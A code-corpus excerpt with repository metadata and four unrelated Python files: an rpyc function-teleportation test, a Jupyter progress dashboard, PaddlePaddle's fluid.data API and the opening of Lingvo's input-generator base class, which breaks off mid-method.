pdxjohnny/rpyc
|
bc8f0223be8436fa77c71cda94cc6610d621a364
|
[
"MIT"
] | 238
|
2020-09-02T22:26:44.000Z
|
2022-03-31T17:49:55.000Z
|
tests/test_teleportation.py
|
pdxjohnny/rpyc
|
bc8f0223be8436fa77c71cda94cc6610d621a364
|
[
"MIT"
] | 87
|
2020-09-02T20:10:35.000Z
|
2022-03-16T16:49:47.000Z
|
tests/test_teleportation.py
|
pdxjohnny/rpyc
|
bc8f0223be8436fa77c71cda94cc6610d621a364
|
[
"MIT"
] | 40
|
2020-09-13T19:53:51.000Z
|
2022-03-21T09:17:48.000Z
|
from __future__ import with_statement
import subprocess
import sys
import os
import rpyc
import types
import unittest
import tracemalloc
tracemalloc.start()
from rpyc.utils.teleportation import export_function, import_function
from rpyc.lib.compat import is_py_3k, is_py_gte38
from rpyc.utils.classic import teleport_function
def b(st):
    """Return *st* encoded as latin-1 bytes on Python 3; unchanged on Python 2."""
    return bytes(st, "latin-1") if sys.version_info[0] >= 3 else st
def f(a):
    """Return a closure that adds *a* to the int value of its argument."""
    return lambda b: a + int(b)
def defaults(a=5, b="hi", c=(5.5, )):
    """Echo positional defaults back as a tuple (used to test teleportation)."""
    return (a, b, c)
def kwdefaults(pos=5, *, a=42, b="bye", c=(12.4, )):
    """Echo keyword-only defaults back as a tuple (used to test teleportation)."""
    return (pos, a, b, c)
def h(a):
    """Return *a* times the current PID (differs when run in another process)."""
    import os
    pid = os.getpid()
    return a * pid
def foo():
    """Return one more than bar(); exercises cross-function references."""
    return 1 + bar()
def bar():
    """Return the fixed test constant 42."""
    answer = 42
    return answer
class TeleportationTest(unittest.TestCase):
    """
    Tests for exporting/importing/teleporting functions over an rpyc
    connection. Each test talks to a one-shot classic rpyc server started
    as a subprocess in setUp().
    """

    def setUp(self):
        # Launch the bundled classic server in one-shot mode on an
        # OS-assigned port (-p0); it prints its host/port on stdout.
        server_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "bin", "rpyc_classic.py")
        self.proc = subprocess.Popen([sys.executable, server_file, "--mode=oneshot", "--host=localhost", "-p0"],
                                     stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

        line = self.proc.stdout.readline().strip()
        if not line:
            # Server produced no banner; surface its stderr for debugging.
            print(self.proc.stderr.read())
            self.fail("server failed to start")
        self.assertEqual(line, b("rpyc-oneshot"), "server failed to start")

        # Second stdout line is "<host>\t<port>".
        host, port = self.proc.stdout.readline().strip().split(b("\t"))
        self.conn = rpyc.classic.connect(host, int(port))

    def tearDown(self):
        self.conn.close()
        self.proc.communicate()  # clear io so resources are closed

    def test(self):
        # Round-trip export/import locally preserves behavior (closures too).
        exp = export_function(f)
        f2 = import_function(exp)
        self.assertEqual(f(6)(7), f2(6)(7))

        # h() multiplies by PID, so the teleported copy must differ.
        h2 = teleport_function(self.conn, h)
        self.assertNotEqual(h(7), h2(7))

    def test_globals(self):
        # A teleported function resolves globals on the remote side.
        def the_answer():
            return THE_ANSWER  # noqa

        teleported = teleport_function(self.conn, the_answer)
        self.conn.namespace['THE_ANSWER'] = 42
        self.assertEqual(teleported(), 42)

        # An explicit globals dict overrides the remote namespace.
        the_globals = self.conn.builtins.dict({'THE_ANSWER': 43})
        teleported2 = teleport_function(self.conn, the_answer, the_globals)
        self.assertEqual(teleported2(), 43)

    def test_def(self):
        # Teleported functions can call other teleported module-level defs.
        foo_ = teleport_function(self.conn, foo)
        bar_ = teleport_function(self.conn, bar)
        self.assertEqual(foo_(), 43)
        self.assertEqual(bar_(), 42)

    def test_defaults(self):
        # Positional default values survive teleportation.
        defaults_ = teleport_function(self.conn, defaults)
        self.assertEqual(defaults_(), defaults())

    def test_kwdefaults(self):
        # Keyword-only default values survive teleportation.
        kwdefaults_ = teleport_function(self.conn, kwdefaults)
        self.assertEqual(kwdefaults_(), kwdefaults())

    def test_compat(self):  # assumes func has only brineable types
        # Build version-specific code-object schemas by hand to verify the
        # 3.7 (no posonly args) and 3.8+ (posonly args) wire formats both
        # import correctly on the remote side.
        def get37_schema(cobj):
            # 3.7-style tuple: second field (posonlyargcount) fixed at 0.
            return (cobj.co_argcount, 0, cobj.co_nlocals, cobj.co_stacksize,
                    cobj.co_flags, cobj.co_code, cobj.co_consts, cobj.co_names, cobj.co_varnames,
                    cobj.co_filename, cobj.co_name, cobj.co_firstlineno, cobj.co_lnotab,
                    cobj.co_freevars, cobj.co_cellvars)

        def get38_schema(cobj):
            # 3.8-style tuple: declares 2 positional-only parameters.
            return (cobj.co_argcount, 2, cobj.co_kwonlyargcount, cobj.co_nlocals,
                    cobj.co_stacksize, cobj.co_flags, cobj.co_code, cobj.co_consts, cobj.co_names,
                    cobj.co_varnames, cobj.co_filename, cobj.co_name, cobj.co_firstlineno, cobj.co_lnotab,
                    cobj.co_freevars, cobj.co_cellvars)

        if is_py_3k:
            pow37 = lambda x, y : x ** y  # noqa
            pow38 = lambda x, y : x ** y  # noqa
            export37 = get37_schema(pow37.__code__)
            export38 = get38_schema(pow38.__code__)
            schema37 = (pow37.__name__, pow37.__module__, pow37.__defaults__, pow37.__kwdefaults__, export37)
            schema38 = (pow38.__name__, pow38.__module__, pow38.__defaults__, pow38.__kwdefaults__, export38)
            pow37_netref = self.conn.modules["rpyc.utils.teleportation"].import_function(schema37)
            pow38_netref = self.conn.modules["rpyc.utils.teleportation"].import_function(schema38)

            self.assertEqual(pow37_netref(2, 3), pow37(2, 3))
            self.assertEqual(pow38_netref(2, 3), pow38(2, 3))
            self.assertEqual(pow37_netref(x=2, y=3), pow37(x=2, y=3))

            if not is_py_gte38:
                return  # skip remainder of tests on 3.7

            # Rebuild pow38 locally with positional-only args to mirror the
            # remote schema: pow38 = lambda x, y, /: x ** y
            pow38.__code__ = types.CodeType(*export38)
            with self.assertRaises(TypeError):  # show local behavior
                pow38(x=2, y=3)
            with self.assertRaises(TypeError):
                pow38_netref(x=2, y=3)
# Allow running this test module directly, outside a test runner.
if __name__ == "__main__":
    unittest.main()
| 34.985507
| 112
| 0.627589
|
4a15b577297a1cc185f582d54ce7977e7b496db1
| 9,458
|
py
|
Python
|
MassiveDisplay.py
|
Dahk/serverless_func_display
|
ecdd687a993323911461c04b381e73d7591c7a01
|
[
"MIT"
] | null | null | null |
MassiveDisplay.py
|
Dahk/serverless_func_display
|
ecdd687a993323911461c04b381e73d7591c7a01
|
[
"MIT"
] | null | null | null |
MassiveDisplay.py
|
Dahk/serverless_func_display
|
ecdd687a993323911461c04b381e73d7591c7a01
|
[
"MIT"
] | null | null | null |
from IPython.display import display, HTML, Javascript
import math, time
class MassiveDisplay():
    """
    Jupyter/IPython progress dashboard for many parallel workers.

    Renders one thin progress bar per worker id in a grid, plus four
    aggregate "stage" bars (Fetching / Processing / Uploading results /
    Finished). The HTML skeleton is emitted once by ``show()``; afterwards
    ``update()`` patches the DOM with small Javascript snippets.
    """

    def __init__(self, idlist):
        # Progress accumulated per bar, keyed by caller-supplied ids.
        self.progressTracker = {
            bar_id: 0
            for bar_id in idlist
        }
        # Full-scale value of every bar; grows (x1.2 steps) whenever a
        # worker's progress exceeds it — see update().
        self.metrics_max = 5
        # Number of workers still running; also baked into the templates
        # below as the stage-bar denominator.
        self.count = len(idlist)
        # Worker counts per stage; everyone starts in stage 0 ("Fetching").
        self.stages = [self.count, 0, 0, 0]
        self.end_stage = len(self.stages) - 1
        # Largest progress value seen per non-final stage; shown as the
        # stage timestamp once the stage empties.
        self.slowest_per_stage = [0, 0, 0]
        # JS is buffered and flushed at most once per frame_delay seconds.
        self.frame_delay = 1
        self.frame_start = 0
        # When True, every bar is redrawn on the next flush (scale changed).
        self.update_scale = False
        self.render_buffer = ''
        # CSS template; {NUM_ROWS}/{NUM_COLS}/{NUM_WORKERS} are filled in by
        # str.replace (not str.format) in show().
        self.css = """
            <style>
                .upper-bars {
                    display: grid;
                    grid-template-rows: repeat({NUM_ROWS}, 6px);
                    grid-template-columns: repeat({NUM_COLS}, 1fr);
                    background-color: #EEE;
                    border: 0;
                    border-radius: 12px;
                    position: relative;
                    box-shadow: 0 75px 125px -57px #7e8f94;
                    padding: 4px;
                }
                .gantt-row-bars {
                    display: grid;
                    grid-template-columns: repeat(100, 1fr);
                    grid-template-rows: auto;
                    margin-bottom: 1px;
                    margin-top: 1px;
                    position: relative;
                    background-color: #C0C5CE;
                    border-radius: 14px;
                    width: auto;
                    margin-left: 3px;
                    margin-right: 3px;
                }
                .gantt-row-bars > div {
                    background-color: #3aabe8;
                    color: #fff;
                    border-radius: 14px;
                }
                .stages {
                    display: grid;
                    position: relative;
                    background-color: #EEE;
                    border: 0;
                    border-radius: 12px;
                    box-shadow: 0 75px 125px -57px #7e8f94;
                    margin: 10px 20%;
                    height: 325px;
                    padding: 15px 0px;
                }
                .stage-bar {
                    display: grid;
                    grid-template-columns: repeat({NUM_WORKERS}, 1fr);
                    grid-template-rows: auto;
                    position: relative;
                    background-color: #D1D6DF;
                    border-radius: 10px;
                    width: auto;
                    margin: 15px 25px;
                    padding: 1px 1px;
                }
                .stage-bar > span {
                    position: absolute;
                    z-index: 1;
                    left: 50%;
                    margin-left: -10%;
                    top: 30%;
                    font-weight: bold;
                    font-size: 16px;
                    font-family: sans-serif;
                    color: #FFF;
                    text-shadow: 0.5px 0.5px 0 #333;
                }
                .stage-bar > div {
                    color: #fff;
                    border-radius: 10px;
                    position: relative;
                    height: 100%;
                }
            </style>
        """
        # One grid row per worker; the inner div is the bar that grows as
        # progress advances (grid-column "1/<part>").
        self.html_row_template = """
            <div id="row_id_{ID}" class="gantt-row-bars" style="grid-column: {COL}; grid-row: {ROW};">
                <div id="bar_id_{ID}" style="grid-column: 1; display: none"></div>
            </div>
        """
        # Dashboard skeleton: worker-bar grid on top, four stage bars below.
        self.html_template = """
            <div style="background-color: #cddade; padding: 30px;">
                <div class="upper-bars">
                    {ROWS}
                </div>
                <div class="stages">
                    <div class="stage-bar">
                        <span style="left: 0; margin-left: 5px;">Fetching</span>
                        <span id="stage0-text">{NUM_WORKERS}/{NUM_WORKERS} (100%)</span>
                        <span id="stage0-timestamp" style="left: 97.5%;"></span>
                        <div id="stage0-bar" style="grid-column: 1/{NUM_WORKERS_PLUS1}; background-color: #034561;"></div>
                    </div>
                    <div class="stage-bar">
                        <span style="left: 0; margin-left: 5px;">Processing</span>
                        <span id="stage1-text">0/{NUM_WORKERS} (0%)</span>
                        <span id="stage1-timestamp" style="left: 97.5%;"></span>
                        <div id="stage1-bar" style="grid-column: 1/1; display: none; background-color: #409d9b;"></div>
                    </div>
                    <div class="stage-bar">
                        <span style="left: 0; margin-left: 5px;">Uploading results</span>
                        <span id="stage2-text">0/{NUM_WORKERS} (0%)</span>
                        <span id="stage2-timestamp" style="left: 97.5%;"></span>
                        <div id="stage2-bar" style="grid-column: 1/1; display: none; background-color: #4fb783;"></div>
                    </div>
                    <div class="stage-bar">
                        <span style="left: 0; margin-left: 5px;">Finished</span>
                        <span id="stage3-text">0/{NUM_WORKERS} (0%)</span>
                        <span id="stage3-timestamp" style="left: 97.5%;"></span>
                        <div id="stage3-bar" style="grid-column: 1/1; display: none; background-color: #8cd154;"></div>
                    </div>
                </div>
            </div>
        """
        # JS snippet: grow one worker bar to column <PART>.
        self.js_update_bar = """
            var elem = document.getElementById("bar_id_{ID}")
            var part = {PART}
            elem.style.gridColumn = "1/" + part
            if (part > 1) elem.style.display = "block"
        """
        # JS snippet: recolor a worker bar as finished.
        self.js_complete_bar = """
            var elem = document.getElementById("bar_id_{ID}")
            elem.style.backgroundColor = "#1abc9c"
        """
        # JS snippet: resize a stage bar and refresh its "n/total (%)"
        # caption. {NUM_WORKERS} is substituted once, here at init time.
        self.js_update_stage = """
            var elem = document.getElementById("stage{STAGE}-bar")
            var part = {PART}
            if (part){
                elem.style.gridColumn = "1/" + (part+1)
                elem.style.display = "block"
            } else
                elem.style.display = "none"
            elem = document.getElementById("stage{STAGE}-text")
            elem.innerHTML = part + "/{NUM_WORKERS} (" + (part / {NUM_WORKERS} * 100).toFixed(2) + "%)"
        """.replace('{NUM_WORKERS}', str(self.count))
        # JS snippet: show the elapsed-time label next to a stage bar.
        self.js_update_timestamp = """
            var elem = document.getElementById("stage{STAGE}-timestamp")
            elem.innerHTML = "{TIME}s"
        """

    def show(self):
        """Render the initial dashboard HTML and start the frame timer."""
        num_rows = self.count
        # Pick a column count that keeps rows short for large worker counts.
        num_cols = 5
        if num_rows > 1024:
            num_cols = 10
        elif num_rows > 512:
            num_cols = 8
        rows_per_col = math.trunc(num_rows / num_cols)
        spare_rows = num_rows % num_cols
        added_extra_row = 1 if spare_rows else 0

        # Lay workers out column by column; the first `spare_rows` columns
        # receive one extra row each.
        rows = ''
        iter_ids = iter(self.progressTracker.keys())
        for col in range(1, num_cols + 1):
            col_template = self.html_row_template.replace('{COL}', str(col))
            for r in range(0, rows_per_col):
                rows = rows + col_template.replace('{ID}', str(next(iter_ids))).replace('{ROW}', str(r + 1))
            if spare_rows:
                rows = rows + col_template.replace('{ID}', str(next(iter_ids))).replace('{ROW}', str(rows_per_col + 1))
                spare_rows -= 1

        html = self.html_template.replace('{ROWS}', rows)\
            .replace('{NUM_WORKERS}', str(self.count)).replace('{NUM_WORKERS_PLUS1}', str(self.count + 1))
        css = self.css.replace('{NUM_ROWS}', str(rows_per_col + added_extra_row)).replace('{NUM_COLS}', str(num_cols))
        display(HTML(html + css))
        self.frame_start = time.time()

    def update(self, bar_id, stage, progress, stage_complete=True):
        """
        Advance `bar_id` by `progress` within `stage`, rescaling bars,
        flushing buffered JS (throttled), and — when `stage_complete` —
        moving the worker into the next stage.
        """
        if bar_id in self.progressTracker and not self.isDone():
            self.progressTracker[bar_id] += progress
            if self.progressTracker[bar_id] > self.metrics_max:
                # Grow the scale in 20% steps until the new value fits, then
                # schedule a full redraw (buffered updates are now stale).
                while self.progressTracker[bar_id] > self.metrics_max:
                    self.metrics_max *= 1.2
                self.render_buffer = ''
                self.update_scale = True
            else:
                self._update_bar(bar_id)

            # Throttled flush: at most one Javascript emission per frame.
            now = time.time()
            if now - self.frame_start > self.frame_delay:
                self._refresh()
                self.frame_start = now

            if stage_complete:
                self._update_stages(stage)
                # Entering the last stage means this worker is finished.
                if stage + 1 == self.end_stage:
                    self.complete(bar_id)
                if self.progressTracker[bar_id] > self.slowest_per_stage[stage]:
                    self.slowest_per_stage[stage] = self.progressTracker[bar_id]
                # Once a stage empties, stamp it with the slowest time seen.
                if self.stages[stage] == 0:
                    self._update_timestamp(stage, self.slowest_per_stage[stage])

    def _update_bar(self, bar_id):
        # Buffer (do not emit yet) the JS that grows one worker bar; the bar
        # spans 100 grid columns, so progress maps to a 1..101 column index.
        part = math.floor(self.progressTracker[bar_id] / self.metrics_max * 100 + 1)
        render = self.js_update_bar.replace('{ID}', str(bar_id)).replace('{PART}', str(part))
        self.render_buffer += render

    def _refresh(self):
        # Emit the buffered JS; if the scale changed, redraw every bar first.
        if self.update_scale:
            for bar_id in self.progressTracker.keys():
                self._update_bar(bar_id)
            self.update_scale = False
        display(Javascript(self.render_buffer))
        self.render_buffer = ''

    def _update_stages(self, stage):
        # Move one worker from `stage` to `stage + 1` and emit JS updating
        # both stage bars immediately (not buffered).
        self.stages[stage] -= 1
        self.stages[stage + 1] += 1
        render = self.js_update_stage.replace('{STAGE}', str(stage)).replace('{PART}', str(self.stages[stage]))
        render += self.js_update_stage.replace('{STAGE}', str(stage + 1)).replace('{PART}', str(self.stages[stage + 1]))
        display(Javascript(render))

    def _update_timestamp(self, stage, time):
        # NOTE: the `time` parameter shadows the `time` module inside this
        # method; it is the elapsed value to display, rounded to 2 decimals.
        render = self.js_update_timestamp.replace('{STAGE}', str(stage)).replace('{TIME}', str(round(time, 2)))
        display(Javascript(render))

    def complete(self, bar_id):
        """Mark one worker's bar as finished and decrement the live count."""
        if bar_id in self.progressTracker and not self.isDone():
            self.count -= 1
            render = self.js_complete_bar.replace('{ID}', str(bar_id))
            display(Javascript(render))

    def isDone(self):
        """Return True once every worker has completed."""
        return not self.count
| 38.762295
| 117
| 0.532882
|
4a15b6a8ea272be38d5158a660932dc4ae1d41a6
| 5,174
|
py
|
Python
|
python/paddle/fluid/data.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | 11
|
2016-08-29T07:43:26.000Z
|
2016-08-29T07:51:24.000Z
|
python/paddle/fluid/data.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/fluid/data.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | 1
|
2021-09-24T11:23:36.000Z
|
2021-09-24T11:23:36.000Z
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import six
from paddle.fluid import core
from paddle.fluid.layer_helper import LayerHelper
from paddle.fluid.data_feeder import check_dtype, check_type
from ..utils import deprecated
from paddle.fluid.framework import static_only
__all__ = ['data']
@static_only
@deprecated(since="2.0.0", update_to="paddle.static.data")
def data(name, shape, dtype='float32', lod_level=0):
    """
    **Data Layer**

    Create a global variable on the default graph that acts as a placeholder
    to be fed with input data by an Executor/ParallelExecutor at run time.
    Unlike the deprecated ``paddle.fluid.layers.data``, this API checks the
    shape and dtype of fed data against the declaration.

    Set a dimension to ``None`` or ``-1`` to accept any size on that axis
    (commonly the batch dimension). The returned variable has
    ``stop_gradient=True`` by default; set ``var.stop_gradient = False`` to
    allow gradients to flow through it.

    Args:
        name (str): The name/alias of the variable, see :ref:`api_guide_Name`
            for more details.
        shape (list|tuple): Declared shape. ``None``/``-1`` marks a dimension
            of variable size.
        dtype (np.dtype|VarType|str, optional): Data type. Supported:
            bool, float16, float32, float64, int8, int16, int32, int64,
            uint8. Default: float32.
        lod_level (int, optional): LoD level of the LoDTensor; usually left
            at the default. See :ref:`user_guide_lod_tensor`. Default: 0.

    Returns:
        Variable: The global variable that gives access to the data.

    Examples:
        .. code-block:: python

            import paddle
            import paddle.fluid as fluid
            import numpy as np

            paddle.enable_static()

            x = fluid.data(name='x', shape=[3, 2, 1], dtype='float32')
            y = fluid.data(name='y', shape=[-1, 2, 1], dtype='float32')
            z = x + y

            feed_data = np.ones(shape=[3, 2, 1], dtype=np.float32)
            exe = fluid.Executor(fluid.CPUPlace())
            out = exe.run(fluid.default_main_program(),
                          feed={'x': feed_data, 'y': feed_data},
                          fetch_list=[z.name])
            print(out)  # elements are all 2.0
    """
    # LayerHelper captures **locals(), so it must be constructed before any
    # additional local names are introduced.
    helper = LayerHelper('data', **locals())

    check_type(name, 'name', (six.binary_type, six.text_type), 'data')
    check_type(shape, 'shape', (list, tuple), 'data')

    # Normalize: a dimension given as None means "any size"; encode as -1.
    shape = [-1 if dim is None else dim for dim in shape]

    return helper.create_global_variable(name=name,
                                         shape=shape,
                                         dtype=dtype,
                                         type=core.VarDesc.VarType.LOD_TENSOR,
                                         stop_gradient=True,
                                         lod_level=lod_level,
                                         is_data=True,
                                         need_check_feed=True)
| 41.063492
| 88
| 0.615578
|
4a15b7e474baa787cf3de9f43b361d0c88c31b7a
| 74,664
|
py
|
Python
|
lingvo/core/base_input_generator.py
|
slowy07/lingvo
|
f38f82541f2332571005a2d06b3badc9d48576d8
|
[
"Apache-2.0"
] | null | null | null |
lingvo/core/base_input_generator.py
|
slowy07/lingvo
|
f38f82541f2332571005a2d06b3badc9d48576d8
|
[
"Apache-2.0"
] | null | null | null |
lingvo/core/base_input_generator.py
|
slowy07/lingvo
|
f38f82541f2332571005a2d06b3badc9d48576d8
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Input generators.
There are three types of batch sizes:
* Device split batch size: Defined by Params() and is the batch size
on each device/TPU core. BaseInputGenerator.params.batch_size and
BaseSequenceInputGenerator.params.bucket_batch_limit specify per-split batch
size.
* GlobalBatchSize: number of examples in a global batch.
* InfeedBatchSize: global_batch_size // num_infeed_hosts, where
num_infeed_hosts is cluster.num_tpu_hosts if using per-host infeed with TPU,
otherwise num_infeed_hosts is 1.
TODO(rpang): Deal with on packed_inputs.
"""
import inspect
import lingvo.compat as tf
from lingvo.core import base_layer
from lingvo.core import batch_utils
from lingvo.core import cluster
from lingvo.core import cluster_factory
from lingvo.core import datasource
from lingvo.core import hyperparams
from lingvo.core import input_generator_helper as ig_helper
from lingvo.core import inspect_utils
from lingvo.core import ops
from lingvo.core import py_utils
from lingvo.core import tokenizers
from lingvo.core import tpu_embedding_layers
# pylint: disable=g-direct-tensorflow-import
from tensorflow.python.ops import io_ops
from tensorflow.python.tpu import tpu_embedding as tpu_embedding_lib
from tensorflow.python.tpu import tpu_feed
# pylint: enable=g-direct-tensorflow-import
DEFAULT_TOKENIZER_KEY = 'default'
INPUT_DATA_STATS_SUMMARIES_COLLECTION = 'INPUT_DATA_STATS_SUMMARIES'
class BaseInputGenerator(base_layer.BaseLayer):
"""The abstract base input generator."""
  @classmethod
  def DefineInfeedParams(cls, p):
    """Defines TPU infeed tuning hyperparams on `p`.

    Args:
      p: A `Params` object to which the infeed-related fields are added.
    """
    # TPU related infeed tuning.
    # Supported use cases:
    #
    # Data parallelism (num_partitions=None)
    #  - single host (use_per_host_infeed=False, tpu_infeed_parallelism=1))
    #  - multi host (use_per_host_infeed=False, tpu_infeed_parallelism>1)
    #  - per host (use_per_host_infeed=True)
    #    - unsharded inputs (_InputBatch returns a single NestedMap)
    #    - sharded inputs (_InputBatch returns a list containing
    #      tpu_number_of_shards NestedMaps)
    # Model parallelism (num_partitions>1 where)
    #  - non-partitioned infeed (use_partitioned_infeed_queue=False):
    #    - Only first partition gets infeed (e.g. manual partition)
    #      - single host (use_per_host_infeed=False)
    #      - per host (use_per_host_infeed=True)
    #    - All partitions gets data parallel infeed (e.g. MoE)
    #      - single host not supported
    #      - per host (use_per_host_infeed=True, use_per_core_infeed=True)
    #        num_partitions should be set to number of partitions per replica
    #  - partitioned infeed (use_partitioned_infeed_queue=True)
    #    - single host (use_per_host_infeed=False)
    #    - per host (use_per_host_infeed=True)
    #      num_partitions should be set to number of partitions per replica
    #      and all partitions should exist on a single host
    p.Define('use_per_host_infeed', False,
             'Whether run infeed op on each host.')
    p.Define('use_per_core_infeed', False,
             'Whether to shard the infeed per TPU core instead of per replica')
    p.Define('tpu_infeed_parallelism', 1,
             'Uses these many python threads to drive infeed concurrently.')
    p.Define('use_partitioned_infeed_queue', False, 'Use partitioned infeed')
    p.Define(
        'num_partitions', None,
        'Number of partitions to split the model graph into. Used with '
        'model parallelism. When >1, it specifies the number of devices '
        'used to place one replica of the model graph nodes.')
  @classmethod
  def Params(cls):
    """Defaults params for input generators.

    Returns:
      A `Params` object carrying the default configuration for input
      generators, including infeed, batching and TPU-embedding options.
    """
    p = super().Params()
    p.name = 'input'
    p.Define(
        'file_datasource', None,
        'The DataSource that produces input batches for this input generator.')
    p.Define(
        'batch_size', 0, 'Batch size for a device split. This will be '
        'scaled to match the accelarator hardware topology.')
    p.Define(
        'num_samples', 0,
        'If non-zero, the dataset contains these many samples. '
        'For test/eval dataset, if we want the test/evel job evaluate '
        'the whole dataset, this param must be set precisely. Otherwise, '
        'this param is optional.')
    p.Define('resettable', False,
             'If True, the input generator must implement Reset().')
    # For an input generator to support samples_per_summary == 0 to indicate
    # using the entire dataset, it must (1) be resettable, and (2) throws
    # tf.errors.OutOfRangeError when reading a batch beyond an epoch.
    p.Define(
        'eval_samples_per_summary', None, 'If not None, overrides '
        'task_p.eval.samples_per_summary directly. Allowed to be 0, which '
        'means to use the entire dataset.')
    p.Define(
        'decoder_samples_per_summary', None, 'If not None, overrides '
        'task_p.eval.decoder_samples_per_summary directly. Allowed to be 0, '
        'which means to use the entire dataset.')
    p.Define(
        'filter_sparse_tensors', False,
        'If true, filter out SparseTensors in input_batch before enqueuing '
        'onto TPU.')
    cls.DefineInfeedParams(p)
    p.Define('remote', hyperparams.Params(),
             'Params to configure remote input policy.')
    p.remote.Define(
        'max_inflights_per_target', 32, 'The maximum number of '
        'concurrent inflight remote input fetches per remote target.')
    p.Define(
        'input_stats_summary_interval_steps', 10,
        'Number of steps in between logging of TF scalar summaries for '
        'training related input data stats.')
    p.Define(
        'tpu_embedding_mode', 'train',
        'The mode used to enqueue TPU embedding ids. Valid values are: {'
        'None: no TPU embedding enqueue ops will be generated; '
        '"inference": enqueue ops will be generated, but backprop will be '
        'disabled (i.e. no gradient will be generated and the embedding '
        'tables are freezed); '
        '"train": both enqueue ops and gradient will be generated when '
        'do_eval is False, otherwise fallback to "inference" mode; }.')
    return p
  def __init__(self, params):
    """Initializes bprop bookkeeping, TPU infeed state and the datasource.

    Args:
      params: A configured `Params` instance for this input generator.
    """
    super().__init__(params)
    # parameter to tell the bprop one hot for all the files.
    # TODO(ankurbpn): Initialize when using sources from mixed record yielders.
    self._bprop_onehot = tf.constant([1], dtype=tf.float32)
    # Each entry is a regular expression specifying the set of variables
    # to bprop per data source.
    self._bprop_variable_filters = ['']
    # For TPU enqueue ops, we do not use graph collections, instead, we rely
    # on this member variable. This is especially useful for
    # executor-driven multiple programs, as we need more fine-grained
    # access to drive the infeed for a specific program, rather than
    # a single global collection across the graph.
    self._tpu_infeed_op = None
    # A list of InfeedQueues.
    self._tpu_queues = []
    # Set to true in GetPreprocessedInputBatch() (and thus _InputBatch())
    self._in_get_processed_input_batch = False
    # Merged TF scalar summaries for training related input data stats.
    self._merged_input_data_summary_op = None
    # Tensorboard layout for charts displaying input data stats.
    self._input_data_summary_layout = None
    assert self.params.tpu_embedding_mode in [None, 'train', 'inference']
    self._tpu_embedding_mode = self.params.tpu_embedding_mode
    if self._tpu_embedding_mode == 'train' and self.do_eval:
      self._tpu_embedding_mode = 'inference'  # Always disable backprop in eval.
    if self.parent:
      # Set the TPU embedding mode for the task. This need to happen in __init__
      # so that the mode is available when the bprop graph is built (note that
      # CreateTpuEmbeddingEnqueueOps() is called *after* building bprop graph).
      tpu_embedding_collection = (
          tpu_embedding_layers.TpuEmbeddingCollection.Get())
      tpu_embedding_collection.SetTaskMode(
          py_utils.TaskCallScopeName(self.parent), self._tpu_embedding_mode)
    self.CreateDatasource()
def CreateDatasource(self):
if self.params.file_datasource:
self.CreateChild('datasource', self.params.file_datasource)
self.datasource.SetInputGenerator(self)
def CommonInputOpArgs(self):
"""Common input params."""
return {}
def GetBpropVariableFilters(self):
return self._bprop_variable_filters
def GetInputSourceOneHot(self):
"""Get the current bprop type of the input generator batch."""
return self._bprop_onehot
  def GlobalBatchSize(self):
    """Returns the total batch size (for stats), int or dynamic int tensor."""
    # Uses `InfeedBatchSize()` instead of calculating it from `p.batch_size`
    # because the behavior would be overridden by subclasses.
    # NOTE(review): scale_infeed_to_global presumably multiplies by the number
    # of infeed hosts when use_per_host_infeed — confirm in batch_utils.
    global_batch_size = batch_utils.scale_infeed_to_global(
        self.InfeedBatchSize(), self.params.use_per_host_infeed)
    tf.logging.info('GlobalBatchSize {}'.format(global_batch_size))
    return global_batch_size
  def InfeedBatchSize(self):
    """Returns the batch size of the input batch: int or dynamic int tensor."""
    # Scales the per-split batch size up to the per-infeed-host size; the
    # scaling policy lives in batch_utils so TPU topology is handled centrally.
    batch_per_input = batch_utils.scale_split_to_infeed(
        self.params.batch_size, self.params.use_per_host_infeed)
    tf.logging.info('batch_per_input: %d', batch_per_input)
    return batch_per_input
def Initialize(self, sess):
"""Initialize using a session."""
if 'datasource' in self.children:
self.datasource.Initialize(sess)
  def _InputBatch(self):
    """The current input batch, not preprocessed.

    This is meant to be overridden by subclasses, but not called directly.
    Callers should use `GetPreprocessedInputBatch()`.

    Returns:
      A NestedMap (or list of NestedMaps when using TPU sharded infeed) of
      input tensors.

    Raises:
      NotImplementedError: Always; subclasses must override.
    """
    raise NotImplementedError('Abstract method')
def _PreprocessInputBatch(self, batch):
"""Preprocesses input batch from _InputBatch.
Args:
batch: A NestedMap (or list of NestedMaps when using TPU sharded infeed)
containing input tensors in the format returned by _InputBatch.
Returns:
A NestedMap containing preprocessed inputs to feed to the model.
"""
return batch
  def GetPreprocessedInputBatch(self):
    """Returns preprocessed batch of inputs.

    These are the actual inputs fed to the model.

    Subclasses generally should not override this function directly. Instead,
    override _InputBatch and maybe _PreprocessInputBatch.
    """
    # Flag observed by subclasses (e.g. to tell datasource-driven calls apart
    # from direct calls).
    self._in_get_processed_input_batch = True
    # TODO(b/139345706): Use self.datasource.GetNext() for all datasource.
    if ('datasource' in self.children and
        isinstance(self.datasource, datasource.TFDatasetSource)):
      if self.cluster.input_targets:
        raise ValueError(
            'TFDatasetSource subclassed DataSources do not support using '
            'train_input_replica. Try tf_data_service_replicas instead.')
      # Batches from a TFDatasetSource bypass _InputBatch/_PreprocessInputBatch
